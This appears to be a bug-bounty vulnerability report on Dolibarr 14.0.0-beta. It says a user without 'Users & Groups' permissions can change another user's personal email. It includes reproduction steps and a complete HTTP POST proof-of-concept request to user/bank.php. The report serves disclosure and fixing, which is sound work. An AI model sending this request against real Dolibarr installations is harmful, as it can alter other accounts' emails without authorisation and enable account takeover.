Improper Privilege Management in dolibarr/dolibarr

Valid

Reported on

May 24th 2021


💥 BUG

unprivileged user can add personal email to another user.

💥 IMPACT

user who dont have any access in "users and groups" can update users personal email.

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEP TO REPRODUCE

1. First goto admin account and add user B as normal user .
Now give user B bellow permission for Banks and cash module .

--->Read financial accounts

Now dont give any permission for Users & Groups module .

So, user B cant see or upadte any users details .

2. Finally goto user B account and sent bellow request to add personall email .

POST /dolibarr-develop/htdocs/user/bank.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?action=editpersonal_email&id=1
Cookie: 
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

action=setpersonal_email&token=$2y$10$TUDmdyquHaipBbj6WfoH1.r/v6qeQdG2OO7oFPqjY1pNkINXfa4gm&id=1&personal_email=admin%40yfg.cosm&modify=Modify

So, user B dont have any "users and groups" permission but still can update personall email.